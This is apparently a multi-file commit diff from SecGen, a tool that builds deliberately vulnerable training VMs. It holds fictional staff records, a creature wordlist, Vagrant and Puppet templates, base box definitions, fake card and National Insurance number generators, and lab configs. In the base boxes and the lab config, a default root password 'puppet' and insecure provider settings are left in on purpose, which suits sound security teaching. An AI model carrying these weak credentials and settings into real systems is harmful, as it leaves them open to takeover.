"password": ""
},
{
"name": "Carl Flattery",
"address": "104, Caedmon, Headingley Campus",
"phone_number": "0113 81 27372",
"email_address": "C.Flattery@leedsbeckett.ac.uk",
"username": "c_flattery",
"password": ""
},
{
"name": "Sam Nicholls",
"address": "212, Caedmon, Headingley Campus",
"phone_number": "0113 81 23726",
"email_address": "S.Nicholls@leedsbeckett.ac.uk",
"username": "s_nicholls",
"password": ""
}
],
"product_name": "University Education",
"intro_paragraph": [
"The School of Film, Music & Performing Arts fosters a culture of creation and participation. We are proud shapers of, and contributors to, the cultural life of this great Northern city a city that is the original birthplace of film. We nurture the arts pioneers of the future: influencers who will not just reflect the outside world, but impact upon it."
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Yorkshire Personal Health",
"business_motto": "We'll have you as good as new in no time.",
"business_address": "159 Longlands St, Bradford BD1 2PX",
"domain": "yorkspersonalhealth.co.uk",
"office_telephone": "01274 200700",
"office_email": "info@yorkspersonalhealth.co.uk",
"industry": "Medical Services",
"manager": {
"name": "Angela Dickinson",
"address": "76103 Joshuah Path, Port Magali, Cambridgeshire, R1 1TR",
"phone_number": "01274 200700 ext 100",
"email_address": "a.dickinson@yorkspersonalhealth.co.uk",
"username": "dickinson_a",
"password": ""
},
"employees": [
{
"name": "Abdullah Carroll",
"address": "Office A, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 101",
"email_address": "a.carroll@yorkspersonalhealth.co.uk",
"username": "carroll_a",
"password": ""
},
{
"name": "Annie Williamson",
"address": "Office B, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 103",
"email_address": "a.williamson@yorkspersonalhealth.co.uk",
"username": "williamson_a",
"password": ""
},
{
"name": "Jammie Marks",
"address": "Office B, 160 Longlands St, Bradford BD1 2PX",
"phone_number": "01274 200700 ext 110",
"email_address": "j.marks@yorkspersonalhealth.co.uk",
"username": "marks_j",
"password": ""
}
],
"product_name": "Check up",
"intro_paragraph": [
"A health assessment is more than a check up. It can be the start of a journey towards better health.",
"We use our health expertise to build a clear picture of where your current health is and identify potential future health risks. After your health assessment, well give you guidance and support to help you become healthier today and in the future."
]
}

View File

@@ -0,0 +1,47 @@
{
"business_name": "",
"business_motto": "",
"business_address": "",
"domain": "",
"office_telephone": "",
"office_email": "",
"industry": "",
"manager": {
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
"employees": [
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
},
{
"name": "",
"address": "",
"phone_number": "",
"email_address": "",
"username": "",
"password": ""
}
],
"product_name": "",
"intro_paragraph": [
""
]
}

View File

@@ -0,0 +1,48 @@
{
"business_name": "Speedy Pizzas",
"business_motto": "Pizza done quick.",
"business_address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"domain": "speedypizzas.co.uk",
"office_telephone": "0113 123 3214",
"office_email": "info@speedypizzas.co.uk",
"industry": "Food",
"manager": {
"name": "David Sand",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "07879 635412",
"email_address": "dave@speedypizzas.co.uk",
"username": "d_sand",
"password": ""
},
"employees": [
{
"name": "Cydney Hermann",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "cydney@speedypizzas.co.uk",
"username": "c_hermann",
"password": ""
},
{
"name": "Lori Marshall",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "lori@speedypizzas.co.uk",
"username": "l_marshall",
"password": ""
},
{
"name": "Andrea Martinez",
"address": "195 Headingley Lane, Headingley, Leeds, LS6 1BN",
"phone_number": "0113 123 3214",
"email_address": "andrea@speedypizzas.co.uk",
"username": "a_martinez",
"password": ""
}
],
"product_name": "Pizza",
"intro_paragraph": [
"Welcome to speedy pizzas. Piping hot food either in store or delivered to your door. Pizza takeaway, parmesan, kebabs and much more.",
"We are based in the centre of Headingley on Headingley lane and will deliver up to 3 miles for free, £1 per additional mile. Red hot pizza on delivery or your money back."
]
}

View File

@@ -0,0 +1,336 @@
dropbear
abaia
abath
adze
aethoneagle
afanc
ahool
akkorokamui
ala
alectryon
alkonost
allocamelus
amalthea
ammut
anansi
anemoi
angel
arachne
ariel
aries
arion
automaton
azeban
baku
balrog
barefrontedhoodwink
basilisk
bast
behemoth
bennu
berserker
bigfoot
bugbear
bunyip
buraq
caladrius
callisto
camazotz
capricornus
centaur
cetan
chamrosh
chimera
chiron
cinnamonbird
cipactli
devil
devilbird
djinn
dragon
drake
dwarf
echidna
elf
emela-ntouka
encantado
ent
familiar
faun
fionnuala
firebird
gandaberunda
gargoyle
gef
giant
giantpenguin
gilledantelope
goblin
grootslang
gunni
haizum
harpy
heqet
hibagon
hobbit
horus
huitzilopochtli
huorn
hydra
ichneumon
ichthyocentaurs
inugami
ipotane
isonade
kamaitachi
karkadann
kasairex
khepri
khnum
kongamato
kraken
kujata
kun
kurma
lamia
lavellan
lindorm
longma
makara
mapinguari
mermaid
merman
minokawa
minotaur
mothman
mujina
naga
namazu
nandibear
nandibull
nekomata
ngoubou
ningyo
nuckelavee
nue
olitiau
onocentaur
oozlumbird
orc
ouroboros
owlman
pabilsag
panther
peluda
peryton
phantomkangaroo
pooka
python
qareen
qilin
qiqirn
qliphoth
quinotaur
ra
rabisu
radande
ragana
rakshasa
redcap
reichsadler
rephaite
revenant
riva
rokurokubi
rompo
rougarou
rusalka
saci
sacipererê
sagari
sakabashira
samebito
samodiva
sampaati
sandman
sandwalker
santelmo
sânziană
sarngika
sarugami
satori
satyrus
sceadugenga
scitalis
scylla
sekhmet
seko
selket
seps
serpent
serpopard
shabti
shachihoko
shade
shedim
shellycoat
shenlong
shibaten
shikigami
shikome
shinigami
shirouneri
shisa
shishi
shtriga
shunoban
sigbin
sileni
simargl
singa
sirrush
sisiutl
skookum
skrzak
skvader
slenderman
sluagh
sobek
soragami
soucouyant
spearfinger
spectre
spiriduş
spriggan
sprite
squonk
strigoi
struthopodes
strzyga
suangi
succubus
sudice
sunekosuri
surma
suzaku
sylvan
syrbotae
tachash
taimatsumaru
takam
tangie
tantankororin
tanuki
taotie
tapairu
tartalo
tartaruchi
tatsu
taurokampoi
tavara
taweret
tecumbalam
tennin
tepegoz
theriocephalus
thoth
tiangou
tianlong
tibicena
tigmamanukan
tigris
tikoloshe
timingila
tipua
titan
tiyanak
tizheruk
tlahuelpuchi
tokeloshe
tomte
topielec
toyol
trasgo
trauco
trenti
tripurasura
tritons
trow
tsuchigumo
turehu
turul
typhon
ubume
uchchaihshravas
undead
undine
unhcegila
unktehi
unktehila
upinis
urayuli
urmahlullu
ushioni
utukku
uwan
valkyrie
valravn
varaha
vedrfolnir
veļi
veo
vetala
vielfras
vila
vilkacis
vodyanoy
vrykolakas
vulkodlak
waldgeist
wani
wekufe
wendigo
werecat
whitestag
wirrycow
wolpertinger
wondjina
wraith
wulver
wyrm
xana
xelhua
yacumama
yacuruna
yaksha
yakshi
yakshini
yale
yali
yallerybrown
yalungur
yanari
yaoguai
yatagarasu
yeren
yethhound
yobuko
yong
yosuzume
ypotryll
yukinko
yuxa
zahhak
zamzummim
zaratan
zburator
zeus
zhulong
zin
zlatorog
zmeu
zmiy
zombie
zorigami
zu
zuijin

View File

@@ -41,6 +41,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="server"/>
<xs:enumeration value="desktop"/>
<xs:enumeration value="attack"/>
<xs:enumeration value="cli"/>
</xs:restriction>
</xs:simpleType>
@@ -49,6 +50,7 @@
<xs:element name="platform" type="platformOptions" minOccurs="1" maxOccurs="unbounded"/>
<xs:element name="distro" type="xs:string" minOccurs="1" maxOccurs="1"/>
<xs:element name="url" type="xs:string" minOccurs="1" maxOccurs="1"/>
<xs:element name="ovirt_template" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="packerfile_path" type="xs:string" minOccurs="0" maxOccurs="1"/>
<xs:element name="product_key" type="xs:string" minOccurs="0" maxOccurs="1"/>
@@ -57,7 +59,6 @@
<xs:element name="reference" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="software_name" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="software_license" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<xs:element name="ovirt_template" type="xs:string" minOccurs="0" maxOccurs="unbounded"/>
<!-- cannot co-exist with a system matching ALL of the optionally specified values (can be repeated for OR)-->
<xs:element name="conflict" minOccurs="0" maxOccurs="unbounded">

View File

@@ -23,6 +23,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="MIT"/>
<xs:enumeration value="Apache v2"/>
<xs:enumeration value="GPLv3"/>
</xs:restriction>
</xs:simpleType>
</xs:element>

View File

@@ -126,6 +126,9 @@
</xs:complexType>
<xs:complexType name="NetworkType">
<xs:sequence>
<xs:element name="input" type="InputElements" minOccurs="0" maxOccurs="unbounded" />
</xs:sequence>
<xs:attribute name="module_path" type="xs:string"/>
<xs:attribute name="name" type="xs:string"/>

View File

@@ -23,6 +23,7 @@
<xs:restriction base="xs:string">
<xs:enumeration value="MIT"/>
<xs:enumeration value="Apache v2"/>
<xs:enumeration value="GPLv3"/>
</xs:restriction>
</xs:simpleType>
</xs:element>

View File

@@ -5,8 +5,11 @@
# <%= @time %>
# Based on <%= @scenario %>
<% require 'json'
require 'base64' -%>
<% prefix = @options[:prefix] ? @options[:prefix] + '_' : ''-%>
require 'base64'
require 'securerandom' -%>
<% scenario_name = @scenario.split('/').last.split('.').first + '-'
prefix = @options[:prefix] ? (@options[:prefix] + '-' + scenario_name) : ('SecGen-' + scenario_name) -%>
VAGRANTFILE_API_VERSION = "2"
Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
@@ -14,6 +17,7 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<% system.module_selections.each do |selected_module|
if selected_module.module_type == 'base'
@base_type = selected_module.attributes['type']
@ovirt_template = selected_module.attributes['ovirt_template']
@cpu_word_size = selected_module.attributes['cpu_word_size'].first.downcase
if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass)
@ovirt_base_template = selected_module.attributes['ovirt_template'].first
@@ -48,7 +52,7 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= if @options.has_key? :cpu_cores
" ovirt.cpu_cores = #{@options[:cpu_cores]}\n"
end -%>
ovirt.console = 'vnc'
ovirt.console = 'spice'
ovirt.insecure = true
ovirt.filtered_api = true
ovirt.debug = true
@@ -90,6 +94,12 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
end -%>
end
<% end %>
<% # Adds line that stops cloud-init from attempting to grab meta-data as eth0 is overwritten with provided networks.
# TODO: Remove when mutli-network vagrant-plugin issue is resolved
if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) -%>
<%= system.name %>.vm.provision 'shell', inline: "echo 'datasource_list: [ None ] '> /etc/cloud/cloud.cfg.d/90_dpkg.cfg"
<% end -%>
# SecGen datastore
# <%= JSON.generate($datastore) %>
@@ -97,10 +107,15 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<% system.module_selections.each do |selected_module| -%>
<%= selected_module.to_s_comment -%>
<% if selected_module.module_type == 'network' and selected_module.received_inputs.include? 'IP_address' %>
<%= ' # This module has a datastore entry for IP_address, using that instead of the default.' -%>
<% elsif selected_module.module_type == 'network' and @options.has_key? :ip_ranges -%>
<%= ' # This module has a command line ip_range, using that instead of the default.' -%>
<% end -%>
<% case selected_module.module_type
when 'base' -%>
<% if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %> # TODO
<%= system.name %>.vm.hostname = '<%= "#{prefix}SecGen-#{system.name}-#{Time.new.strftime("%Y%m%d-%H%M")}".tr('_', '-') %>'
<%= system.name %>.vm.hostname = '<%= "#{prefix}#{system.name}".tr('_', '-') %>'
<%= system.name %>.vm.box = 'ovirt4'
<%= system.name %>.vm.box_url = 'https://github.com/myoung34/vagrant-ovirt4/blob/master/example_box/dummy.box?raw=true'
<% else %>
@@ -114,17 +129,25 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= system.name %>.vm.network :forwarded_port, guest: 5985, host: 5985, id: "winrm", auto_correct: true
<% end %>
<% when 'network' -%>
<% if selected_module.attributes['range'].first.nil? || selected_module.attributes['range'].first == "dhcp" -%>
<% if (selected_module.attributes['range'].first.nil? || selected_module.attributes['range'].first == "dhcp") and (!selected_module.received_inputs.include? 'IP_address' and !@options[:ip_ranges])-%>
<% if (@options.has_key? :ovirtnetwork) && (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp"
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, type: "dhcp", auto_config: false
<% end %>
<% else -%>
<% if (@options.has_key? :ovirtuser) && (@options.has_key? :ovirtpass) %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, :ovirt__ip => "<%= resolve_network(selected_module.attributes['range'].first)%>", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% if @ovirt_template and @ovirt_template.include? 'kali_linux_msf' %>
<%= system.name %>.vm.provision 'shell', inline: "echo \"auto lo\niface lo inet loopback\n\nauto eth0\niface eth0 inet static\n\taddress <%= resolve_network(selected_module)%>\" > /etc/network/interfaces"
<%= system.name %>.vm.provision 'shell', inline: "echo '' > /etc/environment"
<% elsif @ovirt_template and @ovirt_template.include? 'debian_desktop_kde' %>
<%= system.name %>.vm.provision 'shell', inline: "echo \"\nauto eth1\niface eth1 inet static\n\taddress <%= resolve_network(selected_module)%>\" >> /etc/network/interfaces"
<%= system.name %>.vm.provision 'shell', inline: "echo '' > /etc/environment"
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, :ovirt__ip => "<%= resolve_network(selected_module)%>", :ovirt__network_name => '<%= "#{@options[:ovirtnetwork]}" %>'
<% end %>
<% else %>
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, ip: "<%= resolve_network(selected_module.attributes['range'].first)%>"
<%= system.name %>.vm.network :<%= selected_module.attributes['type'].first %>, ip: "<%= resolve_network(selected_module)%>"
<% end %>
<% end -%>
<% when 'vulnerability', 'service', 'utility', 'build' -%>
@@ -132,9 +155,18 @@ Vagrant.configure(VAGRANTFILE_API_VERSION) do |config|
<%= system.name %>.vm.provision "puppet" do | <%=module_name%> |
<% # if there are facter variables to define
if selected_module.received_inputs != {} -%>
<% json_inputs = JSON.generate(selected_module.received_inputs) -%>
<% json_inputs = JSON.generate(selected_module.received_inputs)
b64_json_inputs = Base64.strict_encode64(json_inputs)
# save the inputs in a randomly named file in the
# project out directory of the secgen_functions module
rand = SecureRandom.hex().to_s
dir = "#{@out_dir}/puppet/#{system.name}/modules/secgen_functions/files/json_inputs"
FileUtils.mkdir_p(dir) unless File.exists?(dir)
Print.verbose "Writing #{selected_module.module_path_name} input to: #{dir}/#{rand}"
File.write("#{dir}/#{rand}", b64_json_inputs)
-%>
<%= module_name%>.facter = {
"base64_inputs" => '<%= Base64.strict_encode64(json_inputs)%>'
"base64_inputs_file" => '<%= rand %>',
}
<% end -%>
<%=module_name%>.module_path = "<%="puppet/#{system.name}/modules"%>"

View File

@@ -3,11 +3,11 @@
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Debian 32bit with Puppet</name>
<name>Debian 7 Wheezy Server</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Based on the Official Puppet Vagrant box. Debian 7.8 (wheezy) 32-bit (i386), Puppet 4.3.2 / Puppet Enterprise 2015.3.2 (agent).
This is the primary base box used during development.</description>
This is the primary base box used during development. For testing purposes, the default root password is puppet.</description>
<cpu_word_size>32-bit</cpu_word_size>
<type>server</type>
<type>cli</type>
@@ -15,11 +15,9 @@
<platform>linux</platform>
<platform>unix</platform>
<distro>Debian 7.8 (wheezy) 32-bit (i386)</distro>
<url>http://atlas.hashicorp.com/puppetlabs/boxes/debian-7.8-32-puppet/versions/1.0.4/providers/virtualbox.box</url>
<url>https://app.vagrantup.com/secgen/boxes/debian_wheezy_puppet/versions/1.0.0/providers/virtualbox.box</url>
<ovirt_template>debian_server</ovirt_template>
<reference>https://atlas.hashicorp.com/puppetlabs</reference>
<software_license>various</software_license>
<ovirt_template>debian_server</ovirt_template>
</base>
</base>

View File

@@ -0,0 +1,24 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Debian 7 Wheezy Desktop KDE</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Based on the Official Puppet Vagrant box. Debian 7.8 (wheezy) 32-bit (i386), Puppet 4.3.2 / Puppet Enterprise 2015.3.2 (agent).
Plus KDE and some useful tools.
For testing purposes, the default root password is puppet.</description>
<cpu_word_size>32-bit</cpu_word_size>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Debian 7.8 (wheezy) 32-bit (i386)</distro>
<url>https://app.vagrantup.com/secgen/boxes/debian_wheezy_kde_puppet/versions/1.0.0/providers/virtualbox.box</url>
<ovirt_template>debian_desktop_kde</ovirt_template>
<reference>https://atlas.hashicorp.com/puppetlabs</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,22 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Kali Light, XFCE and Puppet</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Kali Light 2017.1 XFCE minimal install, with puppet.</description>
<cpu_word_size>64-bit</cpu_word_size>
<type>attack</type>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Kali Linux 2017.1</distro>
<url>https://app.vagrantup.com/cliffe/boxes/kali-light/versions/1.0.0/providers/virtualbox.box</url>
<reference>https://app.vagrantup.com/cliffe</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,23 @@
<?xml version="1.0"?>
<base xmlns="http://www.github/cliffe/SecGen/base"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/base">
<name>Kali Light, MSF, XFCE and Puppet</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Kali Light 2017.1 XFCE minimal install, with metasploit framework and puppet.</description>
<cpu_word_size>64-bit</cpu_word_size>
<type>attack</type>
<type>desktop</type>
<platform>linux</platform>
<platform>unix</platform>
<distro>Kali Linux 2017.1</distro>
<url>https://app.vagrantup.com/secgen/boxes/kali_lite_msf_puppet/versions/1.0.1/providers/virtualbox.box</url>
<ovirt_template>kali_linux_msf</ovirt_template>
<reference>https://app.vagrantup.com/cliffe</reference>
<software_license>various</software_license>
</base>

View File

@@ -0,0 +1,6 @@
function secgen_functions::get_parameters($base64_inputs_file) {
$b64_inputs = file("secgen_functions/json_inputs/$base64_inputs_file")
$json_inputs = base64('decode', $b64_inputs)
$secgen_parameters = parsejson($json_inputs)
$secgen_parameters
}

View File

@@ -2,6 +2,13 @@ define secgen_functions::leak_file($leaked_filename, $storage_directory, $string
if ($leaked_filename != ''){
$path_to_leak = "$storage_directory/$leaked_filename"
# create the directory tree, incase the file name has extra layers of directories
exec { "$leaked_from-$path_to_leak":
path => ['/bin', '/usr/bin', '/usr/local/bin', '/sbin', '/usr/sbin'],
command => "mkdir -p `dirname $path_to_leak`;chown $owner. `dirname $path_to_leak`",
provider => shell,
}
# If the file already exists append to it, otherwise create it.
if (defined(File[$path_to_leak])){
notice("File with that name already defined, appending leaked strings instead...")

View File

@@ -6,7 +6,7 @@
<name>SecGen Puppet Functions</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>SecGen functions module encapuslates commonly used functions within secgen (e.g. leaking files,
<description>SecGen functions module encapsulates commonly used functions within secgen (e.g. leaking files,
overshare, flags etc.) into puppet resource statements.
</description>

View File

@@ -1,6 +1,5 @@
class cleanup::init {
$json_inputs = base64('decode', $::base64_inputs)
$secgen_params = parsejson($json_inputs)
$secgen_params = secgen_functions::get_parameters($::base64_inputs_file)
$remove_history = str2bool($secgen_params['remove_history'][0])
$root_password = $secgen_params['root_password'][0]
$clobber_file_times = str2bool($secgen_params['clobber_file_times'][0])

View File

@@ -0,0 +1,35 @@
#!/usr/bin/ruby
require 'base64'
require_relative '../../../../../lib/objects/local_string_encoder.rb'
class CSVEncoder < StringEncoder
def initialize
super
self.module_name = 'CSV Encoder'
end
def encode_all()
require 'csv'
require 'json'
csv_string = CSV.generate do |csv|
strings_to_encode.each do |string_to_encode, count|
row = []
header = []
JSON.parse(string_to_encode).each do |hash|
header << hash[0]
row << hash[1]
end
if count == 0
csv << header
end
csv << row
end
end
self.outputs << csv_string
end
end
CSVEncoder.new.run

View File

@@ -0,0 +1,19 @@
<?xml version="1.0"?>
<encoder xmlns="http://www.github/cliffe/SecGen/encoder"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/encoder">
<name>CSV Encoder</name>
<author>Z. Cliffe Schreuders</author>
<module_license>MIT</module_license>
<description>Converts all of the inputs into a single CSV output. Accepts one layer of JSON hashes. For example, outputs from person generator.</description>
<type>csv</type>
<platform>linux</platform>
<platform>windows</platform>
<read_fact>strings_to_encode</read_fact>
<output_type>csv</output_type>
</encoder>

View File

@@ -0,0 +1,61 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_encoder.rb'
class RandomSelectorEncoder < StringEncoder
attr_accessor :position
attr_accessor :file_path
def initialize
super
self.module_name = 'Random Line Selector'
self.file_path = ''
self.position = ''
end
# @return [Array[string]] containing selected string from file
def encode_all
selected_string = ''
unless file_path.include? '..'
path = "#{ROOT_DIR}/#{file_path}"
file_lines = File.readlines(path)
selected_string = if !position.nil? && (position != '')
file_lines[position.to_i - 1]
else
file_lines.sample
end
end
outputs << selected_string.chomp
end
def process_options(opt, arg)
super
case opt
# Removes any non-alphabet characters
when '--position'
position << arg
when '--file_path'
file_path << arg
else
# do nothing
end
end
def get_options_array
super + [['--position', GetoptLong::OPTIONAL_ARGUMENT],
['--file_path', GetoptLong::OPTIONAL_ARGUMENT]]
end
def encoding_print_string
string = "file_path: #{file_path}"
unless position.to_s.empty?
string += print_string_padding + "position: #{position}"
end
string
end
end
RandomSelectorEncoder.new.run

View File

@@ -0,0 +1,21 @@
<?xml version="1.0"?>
<encoder xmlns="http://www.github/cliffe/SecGen/encoder"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/encoder">
<name>Random Line Selector</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Randomly selects one of the lines from a file and discards the rest.
Optionally pick position in a list (indexed from 1 - in the list [a,b,c] a is in pos 1, b is in pos 2, etc.)
</description>
<type>line_selector</type>
<platform>linux</platform>
<platform>windows</platform>
<read_fact>file_path</read_fact>
<read_fact>position</read_fact>
<output_type>selected_string</output_type>
</encoder>

View File

@@ -10,6 +10,7 @@
<type>string_generator</type>
<type>address_generator</type>
<type>address_generator_uk</type>
<type>address</type>
<type>local_calculation</type>
<platform>linux</platform>

View File

@@ -3,12 +3,13 @@
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Industry Generator</name>
<name>Credit Card Number Generator</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Industry generator using the Forgery ruby gem.</description>
<description>Credit Card Number Generator generator using the Credy ruby gem.</description>
<type>credit_card</type>
<type>credit_card_generator</type>
<type>personal_sensitive</type>
<type>local_calculation</type>
<platform>linux</platform>
<platform>windows</platform>

View File

@@ -0,0 +1,17 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_generator.rb'
class NINGenerator < StringGenerator
def initialize
super
self.module_name = 'National Insurance Number Generator'
end
def generate
nino = "QQ"<<(10..99).to_a.sample(3)*''<<("A".."D").to_a.sample
self.outputs << nino
end
end
NINGenerator.new.run

View File

@@ -0,0 +1,20 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>National Insurance Number</name>
<author>Z. Cliffe Schreuders</author>
<module_license>MIT</module_license>
<description>Generates a UK NIN (National Insurance Number).</description>
<type>national_insurance_number_generator</type>
<type>sensitive_personal</type>
<type>local_calculation</type>
<platform>linux</platform>
<platform>windows</platform>
<reference>https://codereview.stackexchange.com/questions/9464/national-insurance-number-generator</reference>
<output_type>sensitive_personal</output_type>
</generator>

View File

@@ -0,0 +1,20 @@
#!/usr/bin/ruby
require_relative '../../../../../lib/objects/local_string_encoder.rb'
require 'faker'
class WebsiteThemeSelector < StringEncoder
def initialize
super
self.module_name = 'Website Theme Selector'
end
# Selects one of the parameterised_website css themes and returns it
def encode_all
filenames = Dir.entries("#{ROOT_DIR}/modules/services/unix/http/parameterised_website/files/themes/").reject {|f| File.directory?(f) || f[0].include?('.')}
self.outputs << filenames.sample
end
end
WebsiteThemeSelector.new.run

View File

@@ -0,0 +1,17 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Website Theme Generator</name>
<author>Thomas Shaw</author>
<module_license>MIT</module_license>
<description>Theme selector for parameterised_website module.</description>
<type>website_theme</type>
<platform>linux</platform>
<platform>windows</platform>
<output_type>string</output_type>
</generator>

View File

@@ -18,8 +18,11 @@ Our IT team has started developing the servers that we will be deploying; althou
Our network design is to have a web server connected to an Internet accessible IP address (DMZ), and all other servers and end user desktops will be connected to an intranet, any connections out to the Internet via NAT.
Our systems include:
* A web server with network services
* An intranet server, hosting our security policy documents for internal access
* Desktop systems
The Web host will eventually be processing credit card transactions; hopefully thousands of transactions every month.

View File

@@ -2,13 +2,29 @@
require_relative '../../../../../lib/objects/local_string_generator.rb'
class WordGenerator < StringGenerator
attr_accessor :wordlist
def initialize
super
self.wordlist = []
self.module_name = 'Random Word Generator'
end
def get_options_array
super + [['--wordlist', GetoptLong::OPTIONAL_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--wordlist'
self.wordlist << arg;
end
end
def generate
self.outputs << File.readlines("#{WORDLISTS_DIR}/wordlist").sample.chomp
word = File.readlines("#{WORDLISTS_DIR}/#{self.wordlist.sample.chomp}").sample.chomp
self.outputs << word.gsub(/[^\w]/, '')
end
end

View File

@@ -17,6 +17,11 @@
<reference>https://github.com/sophsec/wordlist</reference>
<reference>http://wordlist.sourceforge.net/</reference>
<read_fact>wordlist</read_fact>
<default_input into="wordlist">
<value>wordlist</value>
</default_input>
<output_type>generated_strings</output_type>
</generator>

View File

@@ -0,0 +1,35 @@
#!/usr/bin/ruby
require_relative '../../../../../../lib/objects/local_hackerbot_config_generator.rb'
class Backup < HackerbotConfigGenerator
attr_accessor :server_ip
def initialize
super
self.module_name = 'Hackerbot Config Generator Backups'
self.title = 'Backups'
self.local_dir = File.expand_path('../../',__FILE__)
self.templates_path = "#{self.local_dir}/templates/"
self.config_template_path = "#{self.local_dir}/templates/lab.xml.erb"
self.html_template_path = "#{self.local_dir}/templates/labsheet.html.erb"
self.server_ip = []
end
def get_options_array
super + [['--server_ip', GetoptLong::REQUIRED_ARGUMENT]]
end
def process_options(opt, arg)
super
case opt
when '--server_ip'
self.server_ip << arg;
end
end
end
Backup.new.run

View File

@@ -0,0 +1,49 @@
<?xml version="1.0"?>
<generator xmlns="http://www.github/cliffe/SecGen/generator"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
xsi:schemaLocation="http://www.github/cliffe/SecGen/generator">
<name>Hackerbot config for a backups lab</name>
<author>Z. Cliffe Schreuders</author>
<module_license>GPLv3</module_license>
<description>Generates a config file for a hackerbot for a backups lab.
Topics covered: .</description>
<type>hackerbot_config</type>
<platform>linux</platform>
<read_fact>accounts</read_fact>
<read_fact>flags</read_fact>
<read_fact>root_password</read_fact>
<read_fact>server_ip</read_fact>
<!--TODO: require input, such as accounts, or fail?-->
<default_input into="accounts">
<generator type="account">
<input into="username">
<value>vagrant</value>
</input>
</generator>
</default_input>
<default_input into="flags">
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
<generator type="flag_generator"/>
</default_input>
<default_input into="root_password">
<value>puppet</value>
</default_input>
<output_type>hackerbot</output_type>
</generator>

View File

@@ -0,0 +1,29 @@
<html>
<head>
<title><%= self.title %></title>
</head>
<body>
<meta name="viewport" content="width=device-width, initial-scale=1">
